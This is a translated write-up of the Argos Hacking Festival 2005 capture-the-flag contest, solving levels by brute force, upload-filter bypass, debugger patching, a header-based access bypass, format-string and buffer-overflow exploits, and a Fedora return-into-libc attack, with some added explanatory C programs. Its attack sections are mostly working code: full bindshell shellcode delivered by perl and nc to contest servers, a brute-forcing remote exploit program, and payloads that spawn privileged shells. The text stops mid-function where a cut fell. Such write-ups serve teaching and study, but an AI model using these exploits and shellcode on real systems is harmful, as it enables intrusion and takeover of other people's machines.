================================
/ /
/ Argos Hacking Festival 2005 /
/ (report) /
================================
[hkpco@ns hkpco]$ whoami
id / hkpco(monami)
mail&msn / hkpco@korea.com
homepage / http://hkpco.kr/
name / Park Chan Am
| menu |
---------------------------------------------------
| 1.  level1  - Brute Force                       |
| 2.  level2  - File Upload                       |
| 3.  level3  - Debugging                         |
| 4.  level4  - Windows Crack                     |
| 5.  level5  - Using a Method                    |
| 6.  level6  - $-flag Format_String_Bug          |
| 7.  level7  - Remote cgi Buffer_Over_Flow       |
| 8.  level8  - Remote cgi Format_String_Bug      |
| 9.  level9  - Fedora Buffer_Over_Flow           |
| 10. level10 - Fedora Format_String_Bug          |
| 11. level11 - Rule_find(Sense)                  |
| 12. PostScript                                  |
---------------------------------------------------
!!!!!!!!!!!!!!!!!! 1. level1 - Brute Force !!!!!!!!!!!!!!!!!!
/*
# LEVEL1 #
Pi, the ratio of a circle's circumference to its diameter, is famous for being an infinite decimal.
Enter, in order, the three digits of pi at decimal places 10000 through 10002.
*/
Level 1 was a simple brute force.
Since the three-digit answer may have leading zeros (001, 002, 003, ...), the loop formats the candidate with %03d so that all 1000 values from 000 to 999 are tried.
- bruteforce.c -
#include <stdio.h>
#include <stdlib.h>

/* Try every three-digit answer 000..999 against level1.php. Each request is
 * sent with printf | nc; the responses go to stdout, which is redirected to a
 * file and then grepped for the success message. */
int main( void )
{
int i;
char cmd[1024];
for( i=0 ; i<1000 ; i++ )
{
sprintf( cmd , "(printf \"GET http://168.188.130.231/level1.php?number=%03d HTTP/1.0\\n\\n\")|nc 168.188.130.231 80" , i );
system( cmd );
}
return 0;
}
[hkpco@localhost ahf]$ cat > bruteforce.c
(bruteforce.c as listed above)
[hkpco@localhost ahf]$ gcc -o bruteforce bruteforce.c
[hkpco@localhost ahf]$ ./bruteforce > result
[hkpco@localhost ahf]$ cat result | grep "pass"
Congratulations.
level1 password is 'pi=3.141592'
Please authenticate at the auth server.
# LEVEL1 #
[hkpco@localhost ahf]$
!!!!!!!!!!!!!!!!!! level2 - File Upload !!!!!!!!!!!!!!!!!!
/*
# LEVEL2 #
File upload
*/
Level 2 is a file upload problem.
Uploading files with the php extension is blocked.
Bypass it by uploading the file as .ph (besides *.ph, spellings such as phP and pHp also get past the check, which shows the filter is a case-sensitive blocklist on a single spelling rather than an allowlist).
- hk.ph -
(command passed to cmd) cat /usr/local/apache/htdocs/board/data/level2_vkdlfdjq/auth_vkdlfdjqfhem.txt
Congratulations.
Level2 password is "SoBored!"
Please authenticate at the auth server.
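The bypass above works because the upload filter is a case-sensitive blocklist on one spelling. The following C program is an added illustration, not part of the original write-up or of the contest's board code: it contrasts such a check with an allowlist that compares case-insensitively and requires every dot-separated suffix to be allowed. The allowed-extension list is an assumption made for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* The kind of check level2 had: reject only an exact, case-sensitive ".php"
 * suffix. Returns 1 when the upload is accepted. */
int weak_filter_accepts(const char *name)
{
    size_t n = strlen(name);
    return !(n >= 4 && strcmp(name + n - 4, ".php") == 0);
}

/* Assumed allowlist for an upload directory (illustrative, not the board's). */
static const char *const ALLOWED_EXT[] = { "jpg", "jpeg", "png", "gif", "txt" };

static int ext_allowed(const char *ext, size_t len)
{
    for (size_t i = 0; i < sizeof ALLOWED_EXT / sizeof ALLOWED_EXT[0]; i++) {
        if (strlen(ALLOWED_EXT[i]) != len)
            continue;
        size_t k = 0;
        while (k < len && tolower((unsigned char)ext[k]) == ALLOWED_EXT[i][k])
            k++;
        if (k == len)
            return 1;
    }
    return 0;
}

/* Hardened check: allowlist, case-insensitive, and every dot-separated suffix
 * must be allowed, because Apache's mod_mime can map a handler from any
 * extension in the name ("shell.php.jpg" still reaches PHP). Names containing
 * path separators or lacking an extension are rejected outright. */
int allowlist_accepts(const char *name)
{
    if (strchr(name, '/') || strchr(name, '\\'))
        return 0;
    const char *dot = strchr(name, '.');
    if (dot == NULL || dot == name)
        return 0;
    while (dot) {
        const char *next = strchr(dot + 1, '.');
        size_t len = next ? (size_t)(next - dot - 1) : strlen(dot + 1);
        if (len == 0 || !ext_allowed(dot + 1, len))
            return 0;
        dot = next;
    }
    return 1;
}

int main(void)
{
    const char *names[] = { "hk.php", "hk.ph", "hk.phP", "hk.pHp",
                            "photo.JPG", "shell.php.jpg" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-14s weak: %s  allowlist: %s\n", names[i],
               weak_filter_accepts(names[i]) ? "accept" : "reject",
               allowlist_accepts(names[i]) ? "accept" : "reject");
    return 0;
}
```

Every spelling used in the bypass (.ph, .phP, .pHp) passes the weak check and fails the allowlist; the double-extension case is the one a blocklist on the final suffix alone would still miss.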
!!!!!!!!!!!!!!!!!! level3 - Debugging !!!!!!!!!!!!!!!!!!
/*
# LEVEL3 #
If you connect (SSH) to 168.188.130.231 with the guest account (password: AHF2005guest),
you will find the level3 problem ^^ Have fun solving it~
*/
Level 3 is a debugging problem.
The binary compares another user's uid, 0x1f9 (505), against the return value of getuid(), which sits in the %eax register.
So the check can be passed simply by changing %eax in gdb at that comparison.
[guest@localhost guest]$ gdb -q level3
(gdb) disassemble main
Dump of assembler code for function main:
0x080483b2 : push %ebp
0x080483b3 : mov %esp,%ebp
0x080483b5 : sub $0x8,%esp
0x080483b8 : and $0xfffffff0,%esp
0x080483bb : mov $0x0,%eax
0x080483c0 : sub %eax,%esp
0x080483c2 : movl $0x0,0xfffffffc(%ebp)
0x080483c9 : movl $0x0,0xfffffffc(%ebp)
0x080483d0 : cmpl $0x63,0xfffffffc(%ebp)
0x080483d4 : jle 0x80483d8
0x080483d6 : jmp 0x80483e9
0x080483d8 : lea 0xfffffffc(%ebp),%eax
0x080483db : incl (%eax)
0x080483dd : lea 0xfffffffc(%ebp),%eax
0x080483e0 : incl (%eax)
0x080483e2 : lea 0xfffffffc(%ebp),%eax
0x080483e5 : incl (%eax)
0x080483e7 : jmp 0x80483d0
0x080483e9 : call 0x804829c
////////// 0x080483ee : cmp $0x1f9,%eax ////////// point!
0x080483f3 : jne 0x804840c
0x080483f5 : sub $0xc,%esp
0x080483f8 : push $0x8048516
0x080483fd : call 0x804828c
0x08048402 : add $0x10,%esp
0x08048405 : call 0x804835c
0x0804840a : jmp 0x804841c
0x0804840c : sub $0xc,%esp
0x0804840f : push $0x8048520
0x08048414 : call 0x804828c
0x08048419 : add $0x10,%esp
0x0804841c : mov $0x0,%eax
0x08048421 : leave
0x08048422 : ret
0x08048423 : nop
End of assembler dump.
(gdb) b *0x080483e9
Breakpoint 1 at 0x80483e9
(gdb) b *0x080483ee
Breakpoint 2 at 0x80483ee
(gdb) r
Starting program: /home/guest/level3
Breakpoint 1, 0x080483e9 in main ()
(gdb) info reg eax
eax 0xbffffb04 -1073743100
(gdb) c
Continuing.
Breakpoint 2, 0x080483ee in main ()
(gdb) info reg eax
eax 0x1f6 502
(gdb) set $eax=505
(gdb) info reg eax
eax 0x1f9 505
(gdb) c
Continuing.
Great!!
level3 password : 999379
An even simpler way is to use ptrace.
I modified indra's code:
http://hkpco.joinc.co.kr/ahf/ptrace.c
[guest@localhost guest]$ gcc -o ptrace ptrace.c -DAHF
[guest@localhost guest]$ ./ptrace
UserName: level3
Great!!
level3 password : 999379
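The ptrace.c linked above is not reproduced on the page. The program below is an added example of the same idea, not indra's or the author's code: it forks a child that calls getuid(), traces it with PTRACE_SYSCALL and, at the syscall-exit stop of that call, overwrites the return register so the child observes uid 505 just as the gdb session did. It assumes x86 Linux (the register names come from struct user_regs_struct) and that ptrace is permitted; the child here is an in-process function rather than an execve of level3.

```c
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

#if defined(__x86_64__)
#  define SYSNO(r)  ((r).orig_rax)
#  define RETVAL(r) ((r).rax)
#elif defined(__i386__)
#  define SYSNO(r)  ((r).orig_eax)
#  define RETVAL(r) ((r).eax)
#else
#  error "x86 only: register names differ on other architectures"
#endif

/* glibc's getuid() uses getuid32 on i386 and getuid on x86-64. */
static int is_getuid(long nr)
{
    if (nr == SYS_getuid) return 1;
#ifdef SYS_getuid32
    if (nr == SYS_getuid32) return 1;
#endif
    return 0;
}

/* Fork a child that, like level3, calls getuid() and reports what it got.
 * The parent traces it and, at the syscall-exit stop of getuid, replaces the
 * kernel's answer with want_uid, so the child sees the spoofed uid without any
 * change to its code. Returns what the child saw, or -1 if tracing failed
 * (for example when ptrace is not permitted in this environment). */
long traced_getuid(long want_uid)
{
    int fd[2];
    if (pipe(fd) < 0)
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {                                  /* ---- tracee ---- */
        close(fd[0]);
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0)
            _exit(1);
        raise(SIGSTOP);                              /* hand control to the tracer */
        long uid = (long)getuid();                   /* the call level3 makes */
        if (write(fd[1], &uid, sizeof uid) != (ssize_t)sizeof uid)
            _exit(1);
        _exit(0);
    }

    /* ---- tracer ---- */
    close(fd[1]);
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFSTOPPED(status)) {
        close(fd[0]);
        return -1;
    }
    int entering = 1;                /* getuid stops alternate enter / exit */
    for (;;) {
        if (ptrace(PTRACE_SYSCALL, pid, NULL, NULL) < 0)
            break;
        if (waitpid(pid, &status, 0) < 0 || WIFEXITED(status) || WIFSIGNALED(status))
            break;
        struct user_regs_struct regs;
        if (ptrace(PTRACE_GETREGS, pid, NULL, &regs) < 0)
            break;
        if (!is_getuid((long)SYSNO(regs)))
            continue;                /* some other syscall: leave it alone */
        if (!entering) {             /* exit stop: the real uid is in the register */
            RETVAL(regs) = want_uid;
            ptrace(PTRACE_SETREGS, pid, NULL, &regs);
        }
        entering = !entering;
    }

    long seen = -1;
    if (read(fd[0], &seen, sizeof seen) != (ssize_t)sizeof seen)
        seen = -1;
    close(fd[0]);
    return seen;
}

int main(void)
{
    printf("real getuid() = %ld, traced child saw %ld\n",
           (long)getuid(), traced_getuid(505));
    return 0;
}
```

This is the same effect as `set $eax=505` at the breakpoint, applied automatically: the comparison in the binary never changes, only the value getuid() appears to return. Against a setuid target ptrace is refused, which is why level3 is solvable this way only because it runs as the invoking user.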
!!!!!!!!!!!!!!!!!! level4 - Windows Crack !!!!!!!!!!!!!!!!!!
/*
# LEVEL4 #
Find the serial number in the following program!! ^^
Download the program: level4.exe
*/
This is a cracking problem.
It can be solved with OllyDbg.
Since I cannot include screenshots, here are the steps in order.
1. Open level4.exe
2. Search for -> All referenced text strings -> ASCII "Debugger is detected! program terminated!" (double click)
3. The program has an anti-debugging check, so that part must be bypassed.
Change JE SHORT level4.0040190F to JMP level4.0040190F.
4. Debug -> Run
5. Enter an arbitrary value in the running program and press OK.
6. Around the middle, in the other pane, you see STACK ss:[0012f748]=0116740E, EAX=<whatever you typed>;
the serial is the value at STACK ss:[0012f748]=0116740E.
Convert 0116740E to decimal (0x0116740E = 18248718), start the program again and enter it.
7. Enter 18248718 ->
Great!!
Level 4 password is my password
!!!!!!!!!!!!!!!!!! Level5 - Using a Method !!!!!!!!!!!!!!!!!!
/*
# LEVEL5 #
Hint 1: No HTTP body is needed.
Hint 2: Below is the httpd.conf of the current contest server.
*/
This problem is solved by reading httpd.conf and using a cookie value together with an HTTP method.
Here is the part of httpd.conf we need.
-----------------------------------------------------
SetEnvIf Cookies "we are one" AHF2005
Order deny,allow
deny from all
allow from env=AHF2005
-----------------------------------------------------
SetEnvIf's first argument is a request header name: any request carrying a "Cookies:" header whose value matches "we are one" gets the environment variable AHF2005 set, and "allow from env=AHF2005" then admits it. Since the client controls that header, this is not authentication at all.
Note that the hint says no HTTP body is needed.
If it is not the body, it is most likely the header.
First let's look at the methods available.
I'll use a program I wrote earlier that simply sends an OPTIONS request and prints the result.
(http://hkpco.joinc.co.kr/socket/options_method.c)
[hkpco@ns socket]$ ./options_method ahf.argos.or.kr
------------------------
| OPTIONS * HTTP/1.0 |
------------------------
request send result :
HTTP/1.1 200 OK
Date: Fri, 22 Jul 2005 11:35:19 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Connection: close
Content-Type: text/plain
The available methods are Allow: GET,HEAD,POST,OPTIONS,TRACE.
Among them, requesting with HEAD, the method that returns only the response headers, prints the password (it is emitted as a response header, which is why no body is needed).
[hkpco@ns hkpco]$ telnet ahf.argos.or.kr 80
Trying 168.188.130.239...
Connected to ahf.argos.or.kr.
Escape character is '^]'.
HEAD /~level5/secret_5/ HTTP/1.0
Cookies: AHF2005=we are one
HTTP/1.1 200 OK
Date: Sun, 24 Jul 2005 04:34:11 GMT
Server: Apache
X-Powered-By: PHP/4.4.0
Password : cool guy passket!
Connection: close
Content-Type: text/html
Connection closed by foreign host.
!!!!!!!!!!!!!!!!!! level6 - $-flag Format_String_Bug !!!!!!!!!!!!!!!!!!
/*
# LEVEL6 #
If you connect (SSH) to 168.188.130.231 with the guest account (password: AHF2005guest), there is a file called level6.
Did that make you sm for a moment? Then back to the world of AHF..
*/
This problem is a $-flag format string bug (FSB).
I connected to solve level3 and, mistaking it for level3, ended up solving level6 first;; oops;;
The level6 file has no r permission, so it cannot be read.
But since it has x permission, I copied the file and looked at its contents.
[guest@localhost guest]$ cp level6 a
[guest@localhost guest]$ ls
a level3 level6 public_html
[guest@localhost guest]$ cat a
Came to solve level 6? :)
Sorry for the trouble, but the problem is at /home/level6/level6.
Please teleport there!! - binish of AHF2005 -
[level6@localhost level6]$ ls
level6 password
Let's solve it. The .dtors section starts with the 0xffffffff marker, so the first destructor slot is .dtors+4 = 0x080494f8, which is the address the egg program prints.
[guest@localhost level6]$ objdump -h level6 | grep ".dtors"
18 .dtors 00000008 080494f4 080494f4 000004f4 2**2
[guest@localhost guest]$ ./egg
Using address: 0xbfffdef0
------------------
egg: 0xbfffdef0 |
.dtors: 080494f8 |
------------------
Adding one '+' of padding at a time, at 7 padding characters the buffer could be printed back (AAAA came out as 41414141, so the first word of the buffer lands exactly at argument position 96, the two addresses at 97 and 99).
In the real attack, though, it will not succeed on the first try.
Decrease or increase the padding characters until the attack succeeds.
[guest@localhost guest]$ /home/level6/level6 AAAA+++++++%96\$8x
AAAA+++++++41414141
* Each time one padding character is removed, the computed %96\$57049c width must be increased by 1, so that the running character count stays the same: 16 bytes of addresses + 7 padding + 57049 = 57072 = 0xdef0 (the low half of the egg address 0xbfffdef0), and 57072 + 57615 = 114687, whose low 16 bits are 0xbfff (the high half).
/home/level6/level6 `perl -e 'print "\x41\x41\x41\x41\xf8\x94\x04\x08\x41\x41\x41\x41\xfa\x94\x04\x08"'`+++++++%96\$57049c%97\$n%98\$57615c%99\$n
Failed
/home/level6/level6 `perl -e 'print "\x41\x41\x41\x41\xf8\x94\x04\x08\x41\x41\x41\x41\xfa\x94\x04\x08"'`++++++%96\$57050c%97\$n%98\$57615c%99\$n
Failed
/home/level6/level6 `perl -e 'print "\x41\x41\x41\x41\xf8\x94\x04\x08\x41\x41\x41\x41\xfa\x94\x04\x08"'`+++++%96\$57051c%97\$n%98\$57615c%99\$n
Success
sh-2.05b$ /bin/bash
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[level6@localhost guest]$ id
uid=504(level6) gid=504(guest) groups=502(guest)
[level6@localhost guest]$ cat password
cat: password: Permission denied
In this state the password file cannot be read: the shell runs as uid level6 but still with the guest gid.
The newgrp command gave me level6's gid easily.
[level6@localhost level6]$ newgrp
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[level6@localhost level6]$ id
uid=504(level6) gid=504(level6) groups=502(guest)
[level6@localhost level6]$ cat password
Congratulations.
level6 password is "MayTheForceBeWithYou!!"
Please authenticate at the auth server.
!!!!!!!!!!!!!!!!!! level7 - Remote cgi Buffer_Over_Flow !!!!!!!!!!!!!!!!!!
/*
# LEVEL7 #
LOGIN ::
ID
PASS
*/
This problem is a remote CGI buffer overflow.
Entering an id and pass prints a login-failed message together with a memory dump.
The attack payload is laid out as
[NOP]
[bindshell]
[bindshell_addr]
The bindshell listens on port 30464 (the shellcode stores 0x0077 in sin_port, which read in network byte order is 0x7700 = 30464).
Let's attack. (The ": command not found" lines below come from telnet sending CR LF: the bound shell runs each command and then tries to execute the stray "\r".)
(terminal1)
[hkpco@localhost bof]$ (perl -e 'print "POST /cgi-bin/level7.cgi HTTP/1.0\nHost: 168.188.130.231\nUser-Agent: HTTPTool/1.0\nContent-Length: 500\n\n","\x90"x16,"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff","\x90"x3,"\xd1\xfa\xff\xbf"x100';cat)|nc 168.188.130.231 80
(terminal2)
[hkpco@ns hkpco]$ telnet 168.188.130.231 30464
Trying 168.188.130.231...
Connected to 168.188.130.231.
Escape character is '^]'.
ls;
dumpcode.h
level7.cgi
level7_qjvjdhqjvmffh
: command not found
cd level7_qjvjdhqjvmffh;
: command not found
ls;
auth_dhqjvmffh.txt
: command not found
cat auth_dhqjvmffh.txt;
Congratulations.
level 7 passwd is "ThereIsNoFork!";
Please authenticate at the auth server.
: command not found
!!!!!!!!!!!!!!!!!! level8 - Remote cgi Format_String_Bug !!!!!!!!!!!!!!!!!!
/*
LOGIN
ID
PASS
*/
This is also a remote attack.
It could also be called a Remote CGI Format String Bug in Heap Memory~
Anyone who has read passket's `FSB in Heap Memory` should be able to solve it without trouble.
passket's document, which I read about half a year ago, was a big help.
(I still fumbled even after reading it;;)
As passket's document also mentions, printf's argument pointer walks up the stack from 0xbf...... toward 0xc0......,
so a format string that lives only in the heap (0x08......) is useless: the addresses you plant in it are never reached as arguments.
But if the program also copies the input onto the stack, the story changes.
Here is the structure of the payload.
(i and j are the brute-forced bytes)
AAAA[brute1][\x04\x08]CCCC[brute2][\x04\x08] <- j+2 , i //16byte
[dummy] //240byte
----------↑buf1 , ↓buf2----------
[%08x]x7 //56byte
[%1996c%hn%39068c%hn] <- j , i //2byte
[NOP]x100 //100byte
[bind_code] //177byte
The code brute-forces the .dtors entry address (0x0804iijj, with i from 0x99 to 0x9f) and overwrites it with the two %hn writes.
Run the program, wait a moment, then connect to the port (30464) opened by the bindshell.
- remote_attack.c -
#include <stdio.h>
#include <stdlib.h>

/* Brute-force the two unknown bytes (i, j) of the .dtors address. Each
 * iteration sends one POST whose format string writes the shellcode address
 * into .dtors with two %hn; the bindshell appears on port 30464 on a hit. */
int main( void )
{
int i, j;
char cmd[2048];
for(i=0x99;i<0xa0;i++)
for(j=0x01;j<0xff;j++)
{
snprintf( cmd , sizeof cmd , "printf \"\\n\"|(perl -e 'print \"POST /cgi-bin/level8.cgi HTTP/1.0\\n\",\"Host: 168.188.130.232\\n\",\"Content-Length: 613\\n\\n\",\"AAAA\\x%02x\\x%02x\\x04\\x08CCCC\\x%02x\\x%02x\\x04\\x08\", \"A\"x240,\"%%08x\"x7, \"%%1996c%%hn%%39068c%%hn\" , \"\\x90\"x100,\"\\x31\\xc0\\xb0\\x02\\xcd\\x80\\x85\\xc0\\x75\\x43\\xeb\\x43\\x5e\\x31\\xc0\\x31\\xdb\\x89\\xf1\\xb0\\x02\\x89\\x06\\xb0\\x01\\x89\\x46\\x04\\xb0\\x06\\x89\\x46\\x08\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\x06\\xb0\\x02\\x66\\x89\\x46\\x0c\\xb0\\x77\\x66\\x89\\x46\\x0e\\x8d\\x46\\x0c\\x89\\x46\\x04\\x31\\xc0\\x89\\x46\\x10\\xb0\\x10\\x89\\x46\\x08\\xb0\\x66\\xb3\\x02\\xcd\\x80\\xeb\\x04\\xeb\\x55\\xeb\\x5b\\xb0\\x01\\x89\\x46\\x04\\xb0\\x66\\xb3\\x04\\xcd\\x80\\x31\\xc0\\x89\\x46\\x04\\x89\\x46\\x08\\xb0\\x66\\xb3\\x05\\xcd\\x80\\x88\\xc3\\xb0\\x3f\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb8\\x2f\\x62\\x69\\x6e\\x89\\x06\\xb8\\x2f\\x73\\x68\\x2f\\x89\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xc0\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\x5b\\xff\\xff\\xff\"';cat) | nc 168.188.130.232 80" , j+2 , i , j , i );
system( cmd );
}
return 0;
}
(terminal1)
[hkpco@localhost fsb]$ gcc -o remote_attack remote_attack.c
[hkpco@localhost fsb]$ ./remote_attack >/dev/null
(terminal2)
[hkpco@ns hkpco]$ telnet 168.188.130.232 30464
Trying 168.188.130.232...
Connected to 168.188.130.232.
Escape character is '^]'.
ls;
dumpcode.h
level8.cgi
level8_glqdudduvhapt
: command not found
cd level8_glqdudduvhapt;
: command not found
ls;
auth_eggmelong.txt
: command not found
cat auth_eggmelong.txt;
Congratulations.
level8 password is "AnotherWayToMyWay~"
Please authenticate at the auth server.
!!!!!!!!!!!!!!!!!! level9 - Fedora Buffer_Over_Flow !!!!!!!!!!!!!!!!!!
/*
# LEVEL9 #
If you log in (SSH) to 168.188.130.233 with the guest account (password: guest_ahf2005),
you will find the level9 problem file. Good luck!
*/
Level 9 is a basic Fedora BOF problem.
I won't explain Fedora BOF in detail; the essentials are that library addresses begin with a 0x00 byte and the stack is not executable, so instead of returning into shellcode we return into execl inside libc with a fake frame.
Let's attack the problem.
[guest@localhost guest]$ cat /etc/*release
Fedora Core release 2 (Tettnang)
Fedora Core release 2 (Tettnang)
// Fedora confirmed
[guest@localhost .hk]$ gdb -q /home/guest/level9
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80485e0
(gdb) r
Starting program: /home/guest/level9
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: No such file or directory.
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared library symbols:
: No such file or directory.
Error while reading shared library symbols:
: No such file or directory.
Breakpoint 1, 0x080485e0 in main ()
(gdb) disassemble execl
Dump of assembler code for function execl:
0x00197a00 : push %ebp
0x00197a01 : mov %esp,%ebp
[ 0x00197a03 : lea 0x10(%ebp),%eax ] // the point!
.
.
.
---Type to continue, or q to quit---q
Quit
[guest@localhost .hk]$ gdb -q /home/guest/level9
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80485e0
(gdb) r
Starting program: /home/guest/level9
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: No such file or directory.
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared library symbols:
: No such file or directory.
Error while reading shared library symbols:
: No such file or directory.
Breakpoint 1, 0x080485e0 in main ()
(gdb) x/50x 0x8049000
0x8049000: 0x464c457f 0x00010101 0x00000000 0x00000000
0x8049010: 0x00030002 0x00000001 0x080482c0 0x00000034
0x8049020: 0x00000788 0x00000000 0x00200034 0x00280007
0x8049030: 0x0019001c 0x00000006 0x00000034 0x08048034
0x8049040: 0x08048034 0x000000e0 0x000000e0 0x00000005
0x8049050: 0x00000004 0x00000003 0x00000114 0x08048114
0x8049060: 0x08048114 0x00000013 0x00000013 0x00000004
0x8049070: 0x00000001 0x00000001 0x00000000 0x08048000
0x8049080: 0x08048000 0x0000047c 0x0000047c 0x00000005
0x8049090: 0x00001000 0x00000001 0x0000047c 0x0804947c
0x80490a0: 0x0804947c 0x00000100 0x00000104 0x00000006
0x80490b0: 0x00001000 0x00000002 0x00000490 0x08049490
0x80490c0: 0x08049490 0x000000c8
(gdb)
.
.
.
0x8049560 <_GLOBAL_OFFSET_TABLE_+4>: 0x0095f4d0 0x00954830 0x009769f0 0x080482b6
(gdb) x/8x 0x8049564
0x8049564 <_GLOBAL_OFFSET_TABLE_+8>: 0x00954830 [ 0x009769f0 0x080482b6 0x00000000 ] // the point!
0x8049574 <__dso_handle>: 0x00000000 0x08049488 0x00000000 0x00000000
(gdb) x/8x 0x009769f0
0x9769f0 <__libc_start_main>: [0x57e58955 0xec835356 0x0c458b4c 0xe810558b] // the point!
0x976a00 <__libc_start_main+16>: [0xffffff09 0x25f8c381] 0x7d8b00[10] 0x1c758b18 // the point!
[guest@localhost .hk]$ cat > sh.c
#include <unistd.h>

/* Target of the symlink: make the real ids match the effective ones, then
 * spawn a shell. execl's argument list must end with a null pointer. */
int main( void )
{
setreuid(geteuid(),geteuid());
setregid(getegid(),getegid());
execl("/bin/sh", "sh", (char *)0);
return 0;
}
[guest@localhost .hk]$ gcc -o sh sh.c
[guest@localhost .hk]$ ln -s ./sh "`perl -e 'print "\x55\x89\xe5\x57\x56\x53\x83\xec\x4c\x8b\x45\x0c\x8b\x55\x10\xe8\x09\xff\xff\xff\x81\xc3\xf8\x25\x10"'`"
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "euc_KR"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
[guest@localhost .hk]$ ls
U??WVS??L?E??U?????????%? sh sh.c
[guest@localhost .hk]$ gdb -q /home/guest/level9_vul
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) disassemble main
Dump of assembler code for function main:
0x08048370 : push %ebp
0x08048371 : mov %esp,%ebp
0x08048373 : sub $0x108,%esp <- 0x108==264
.
.
.
(gdb) quit
Finally, the warhead for the attack is as follows.
| dummy(264 bytes) | (address holding execl's first argument) - 8 | (execl+3) addr |
The saved EBP becomes 0x08049560, so after main's leave/ret, execl+3 (past push %ebp; mov %esp,%ebp) reads its path from 8(%ebp) = 0x08049568, which holds 0x009769f0, the pointer to __libc_start_main; the bytes of that code up to the first NUL are exactly the symlink name created above. 0xc(%ebp) = 0x0804956c supplies argv[0], and 0x10(%ebp) = 0x08049570 is 0, which terminates the argument list. The 0x00 high byte of 0x00197a03 is supplied by the terminating NUL of argv[1].
Now let's carry out the final attack.
[guest@localhost .hk]$ /home/guest/level9_vul "`perl -e 'print "A"x264,"\x60\x95\x04\x08","\x03\x7a\x19"'`"
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "euc_KR"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
sh-2.05b$ id
uid=504(guest) gid=501(level9) groups=504(guest)
sh-2.05b$ cat /home/guest/level9_password
Congratulations.
Level9 password id "FeDoRaCoRe2 was broken!"
Please authenticate at the auth server.
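To make the pointer chase concrete, here is an added C example (not the author's exploit code) that derives the symlink name from the dump words shown above and assembles argv[1] from the three pieces of the layout. The GOT slot 0x08049568, execl at 0x00197a00 and the 264-byte frame are taken from the gdb output; the function names and the constructed main are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Words gdb printed for x/8x 0x009769f0 (__libc_start_main), copied from the
 * session above; the 8th word is past the first NUL and never used. */
static const uint32_t LIBC_START_MAIN_WORDS[8] = {
    0x57e58955, 0xec835356, 0x0c458b4c, 0xe810558b,
    0xffffff09, 0x25f8c381, 0x7d8b0010, 0x1c758b18,
};

/* execl() takes 8(%ebp) as a char *path, so the "file name" it will look up is
 * the little-endian byte stream of the code it points at, up to the first NUL.
 * Copies that name into out (capacity cap) and returns its length. */
size_t code_bytes_as_filename(const uint32_t *words, size_t nwords,
                              unsigned char *out, size_t cap)
{
    size_t n = 0;
    for (size_t i = 0; i < nwords; i++)
        for (int shift = 0; shift < 32; shift += 8) {
            unsigned char b = (unsigned char)(words[i] >> shift);
            if (b == 0 || n == cap)
                return n;
            out[n++] = b;
        }
    return n;
}

/* argv[1] for level9_vul: dummy bytes up to the saved EBP, then a fake EBP of
 * (slot holding the pointer to those code bytes) - 8 so that 8(%ebp) is the
 * path and 0x10(%ebp) is a NULL argument terminator, then execl+3 as the
 * return address (skipping push %ebp; mov %esp,%ebp keeps our EBP). The
 * overflow is a string copy, so only three bytes of the return address are
 * written and the string's own terminator supplies the 0x00 high byte; the
 * fake EBP must therefore be NUL-free. Returns the payload length, 0 on error. */
size_t build_level9_payload(size_t dummy_len, uint32_t ptr_slot, uint32_t execl_addr,
                            unsigned char *out, size_t cap)
{
    uint32_t fake_ebp = ptr_slot - 8;
    uint32_t ret = execl_addr + 3;
    if ((ret >> 24) != 0 || dummy_len + 8 > cap)
        return 0;
    for (int i = 0; i < 4; i++)
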